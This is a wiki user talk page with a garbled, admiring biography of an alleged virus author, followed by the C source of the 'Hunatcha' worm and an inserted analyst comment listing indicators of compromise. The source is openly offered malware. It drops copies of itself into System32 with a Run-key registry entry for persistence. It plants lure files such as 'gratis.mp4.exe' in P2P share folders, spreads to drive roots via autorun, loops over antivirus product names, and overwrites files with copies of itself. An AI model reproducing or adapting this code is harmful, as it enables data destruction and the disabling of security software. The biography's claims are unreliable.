User talk:Vxerskeeper

Branko D Tomich (undermine)
The Hunatcha worm, or Global worm, of April 6, 2010 was one of the expert-technique CP worms distributed via the Internet, for example over P2P file sharing. It is considered the first worm and was certainly the first to gain media attention, because it tried killing any AV company's software. It was written by an expert at CP Lab, Branko D Tomich, and launched on April 6, 2010 from Windows XP. -- Branko D Tomic (undermine) was born on October 6, 1982 in Belgrade, Serbia, and lived until the age of 27 in his village, Blizna. He enthusiastically explored worms and computer viruses of every kind. As he said: " I'm not a hacker I'm a expert of damage in internet security system!!!" and " MyWild Love is Virus for O.S ". He also loved to explore any web page deep down to its nucleus, the place where the critical red button is for every virus author, but he never jumped into the trap hole. When he started his first attacker blog he got free hosting from people, but out of deep love he did not want to crash that blog; he left it to people to crash after his own death. Pictures of the blog are here: Blog pics. Branko D Tomich is one of the first experts who is dead in the Serbian mind but lives forever in our hearts and minds. Branko D Tomic told us: " People can kill my body but never my soul and mind!!! " Branko D Tomic (luxilius/undermine) from Blizna, born October 6, 1982; he also hid DNA somewhere for people who want to reproduce the virus ....

=
===========Hunatcha Worm============================================================ /*================================================================  Undermine's Generic Hunatcha VirWorm http://undermine.bloger.hr Your rights take full responsability of any  damage. The main reason for this virus is to show you how works, so this is why i added that variable. sorry for the mess but like i said it's mostly to explain my virus. Peoples interessed in this technic should also rewrite DATA d32, in line w32. It also change register usage, but using a more advanced technic update taskkill.

=
=====================================================*/
/*
 * Analyst notes: a defensive reading of the listing that follows. The listing
 * itself is left exactly as published.
 *
 * Layout caveat: the page collapsed the source onto three physical lines, so
 * each "//" fragment now sits in the middle of a line. Read the code statement
 * by statement, not by this line layout.
 *
 * Globals
 *   Inf_Drives  0-terminated table of the drive roots "A:" .. "Z:".
 *   Taskkill    0-terminated table of name fragments of security products, in
 *               several case variants ("av", "defend", "Kaspersky", "sophos",
 *               "Norton", "NOD32", "Zoner", "Dr.", ...).
 *   DirArray    static table of 250000 entries of MAX_PATH chars, filled by
 *               FillArray(); dircount is the next free slot.
 *   windir      global path buffer; WinMain turns it into the drop path.
 *
 * WinMain: calls none of the functions defined after it, so the artifacts
 * attributable to this listing as written are the ones below.
 *   - Copies the running executable to <Windows dir>\System32\update.exe,
 *     overwriting an existing file of that name.
 *   - Stores that path as a REG_SZ value under HKEY_CURRENT_USER:
 *       Software\undermine                                    "Hunatcha"
 *       Software\Microsoft\Internet Explorer\InternetRegistry "Hunatcha"
 *       Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\Undermine
 *                                                             "Explorer"
 *       Software\Microsoft\Windows\CurrentVersion\Run         "Hunatcha"
 *       Software\Kazaa\Transfer                               "Upload"
 *     The CurrentVersion\Run value is the logon-persistence entry.
 *   - Copies itself to double-extension names:
 *       C:\Program Files\KaZaa\My Shared Folder\users_info.txt.exe
 *       C:\Program Files\KaZaa\video sister.avi.exe
 *       C:\Program Files\LimeWire\gratis.mp4.exe
 *       C:\Program Files\LimeWire\My Shared Folder\info download.txt.exe
 *       C:\Documents and Settings\%user%\My Documents\Downloads\upload.jpg.exe
 *   - Shows a message box titled "Hunatcha Informer".
 *   - No return value of CopyFile, RegCreateKey or RegSetValueEx is checked.
 *
 * NeverAntiVirus: endless loop; once a second it walks the Taskkill table and
 * makes one system() call per entry. system() goes through the command
 * interpreter, so the observable trace would be a burst of short-lived
 * interpreter child processes every second.
 *
 * InfectDrives: endless loop with a 2 second pause. For every drive letter it
 * copies <System dir>\updater.exe to <drive>\allow.exe. On success it formats
 * an [autorun] stanza (open=allow.exe) into a local buffer, and it sets the
 * Hidden and not-content-indexed attributes on allow.exe and on the
 * autorun.inf path. The fopen/fputs/fclose calls for autorun.inf appear only
 * as "//" fragments in the listing.
 *
 * InfectFiles: enumerates "*.*" in the current directory. For each entry that
 * its self-skip test lets through, it resets the attributes to NORMAL and
 * overwrites the entry with a copy of the running executable. This is the
 * destructive routine: overwritten files have to come back from backup.
 *
 * FindDirectory: recursive directory walk. An entry whose attributes are
 * exactly DIRECTORY, or DIRECTORY plus SYSTEM, and whose name contains no "."
 * is recorded with FillArray(); the walk then recurses into it.
 *
 * FillArray: copies one path into DirArray[dircount] and increments dircount.
 * No bound check on dircount is visible.
 *
 * p2p_spread: reads the module path and appends "\System32\update.exe" to the
 * global windir; nothing else happens in it.
 *
 * Hunting and hardening pointers taken from the strings above:
 *   - an HKCU Run value named "Hunatcha", or any of the other four values;
 *   - update.exe or updater.exe in the system directory that does not belong
 *     to an installed product;
 *   - executables named *.txt.exe, *.avi.exe, *.mp4.exe or *.jpg.exe in P2P
 *     share or download folders (show file extensions so the .exe is visible);
 *   - a hidden allow.exe in a drive root (disabling AutoRun on removable and
 *     network drives removes that launch path in general).
 */
const char *Inf_Drives[] = {"A:","B:","C:","D:","E:","F:","G:","H:","I:","J:","K:","L:","M:","N:","O:","P:", "Q:","R:","S:","T:","U:","V:","W:","X:","Y:","Z:",0}; const char *Taskkill[] = {"av","Av","AV","defend","Defend","DEFEND","f-","F-","defense","Defense","DEFENSE", "Kaspersky","KASPERSKY","kaspersky","sophos","SOPHOS","Sophos","Scanner","SCANNER","scanner","Norton","norton", "NORTON","Security","SECURITY","security","Anti","ANTI","anti","SCAN","Scan","scan","Malware","MALWARE","malware", "Virus","VIRUS","virus","NOD32","nod32","Nod32","Zoner","ZONER","zoner","SECUR","Secur","secur","Dr.","DR.",0}; int InfectDrives(void); int InfectFiles(void); void FindDirectory(LPCSTR DirPath); void FillArray(LPCSTR Directory); char DirArray[250000][MAX_PATH]; int dircount = 0; char windir[MAX_PATH]; HKEY hKey; int APIENTRY WinMain(HINSTANCE hInstance,                    HINSTANCE hPrevInstance,                     LPSTR     lpCmdLine,                     int       nCmdShow) { int count; char wormpath[256]; GetWindowsDirectory(windir, sizeof(windir)); HMODULE hMe = GetModuleHandle(NULL); DWORD nRet = GetModuleFileName(hMe, wormpath, 256); HKEY hKey; strcat(windir, "\\System32\\update.exe"); CopyFile(wormpath, windir, 0); RegCreateKey (HKEY_CURRENT_USER, "Software\\undermine", &hKey); RegSetValueEx (hKey, "Hunatcha", 0, REG_SZ, (LPBYTE) windir, sizeof(windir)); RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\InternetRegistry",&hKey); RegSetValueEx (hKey, "Hunatcha", 0, REG_SZ, (LPBYTE) windir, sizeof(windir)); RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\Undermine",&hKey); RegSetValueEx (hKey, "Explorer", 0, REG_SZ, (LPBYTE) windir, sizeof(windir)); RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", &hKey); RegSetValueEx (hKey, "Hunatcha", 0, REG_SZ, (LPBYTE)windir, sizeof(windir)); RegCreateKey 
(HKEY_CURRENT_USER, "Software\\Kazaa\\Transfer", &hKey); RegSetValueEx (hKey, "Upload", 0, REG_SZ, (LPBYTE)windir, sizeof(windir)); CopyFile(wormpath, "C:\\Program Files\\KaZaa\\My Shared Folder\\users_info.txt.exe", 0); CopyFile(wormpath, "C:\\Program Files\\KaZaa\\video sister.avi.exe", 0); CopyFile(wormpath, "C:\\Program Files\\LimeWire\\gratis.mp4.exe", 0); CopyFile(wormpath, "C:\\Program Files\\LimeWire\\My Shared Folder\\info download.txt.exe", 0); CopyFile(wormpath, "C:\\Documents and Settings\\%user%\\My Documents\\Downloads\\upload.jpg.exe", 0); MessageBox (0, "Your system need to update my new world...", "Hunatcha Informer", MB_ICONINFORMATION | MB_OK); {    count = count ^ 5; } return 0; } int NeverAntiVirus(void) {	int c;	while(1) { for(c=0;Taskkill[c]!=0;c++) system((char *)&Taskkill[c]); Sleep(1000); }	return 0; } int InfectDrives(void) {	char IFile[256], NewFile[256], Autorun[256], InfFile[256]; GetSystemDirectory(IFile,sizeof(IFile)); strcat(IFile,"\\updater.exe"); int i;	while(1) { for(i = 0; Inf_Drives[i]; i++) { memset(NewFile,'\0',sizeof(NewFile)); memset(Autorun,'\0',sizeof(Autorun)); memset(InfFile,'\0',sizeof(InfFile)); strcpy(NewFile,Inf_Drives[i]); strcpy(Autorun,Inf_Drives[i]); strcat(NewFile,"\\allow.exe"); strcat(Autorun,"\\autorun.inf"); if(CopyFile(IFile,NewFile,FALSE)) { //	FILE *runfile = fopen(Autorun,"wb"); sprintf(InfFile,"[autorun]\r\nopen=allow.exe\r\naction=Open folder to view files\r\n"); //	fputs(InfFile,runfile); //	fclose(runfile); SetFileAttributes(NewFile,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_NOT_CONTENT_INDEXED); SetFileAttributes(Autorun,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_NOT_CONTENT_INDEXED); }		}		Sleep(2000); } } int InfectFiles(void) {	WIN32_FIND_DATA w32; HANDLE fHandle; char MyFile[256]; GetModuleFileName(NULL,MyFile,sizeof(MyFile)); if((fHandle = FindFirstFile("*.*",&w32))==INVALID_HANDLE_VALUE) return 1; else { if(w32.cFileName==MyFile) goto next; SetFileAttributes(w32.cFileName,FILE_ATTRIBUTE_NORMAL); 
CopyFile(MyFile,w32.cFileName,FALSE); next: while(FindNextFile(fHandle,&w32)) { if(w32.cFileName==MyFile) continue; SetFileAttributes(w32.cFileName,FILE_ATTRIBUTE_NORMAL); CopyFile(MyFile,w32.cFileName,FALSE); }		FindClose(fHandle); }	return 0; } void FindDirectory(LPCSTR DirPath) {    WIN32_FIND_DATA FindData; HANDLE hFind; char Path[MAX_PATH]; hFind = FindFirstFile(DirPath, &FindData); do    { strcpy(Path, DirPath); Path[strlen(DirPath)-1] = 0; strcat(Path, FindData.cFileName); if ((FindData.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY || FindData.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) && (strstr(FindData.cFileName,".")==0)) {          FillArray(Path); strcat(Path,"\\*"); FindDirectory(Path); }    } while (FindNextFile(hFind,&FindData)); FindClose(hFind); } void FillArray(LPCSTR Directory) {    lstrcpy(DirArray[dircount],Directory); dircount++; } void p2p_spread(void) {	char wormpath[MAX_PATH]; GetModuleFileName(NULL, wormpath, MAX_PATH); strcat(windir, "\\System32\\update.exe"); }
 * 1) include 
 * 2) define PORT 21
 * 3) define VirSize	(2105+1)
 * 4) define LenID	(7+1)

=
===========Hunatcha Worm=========================================================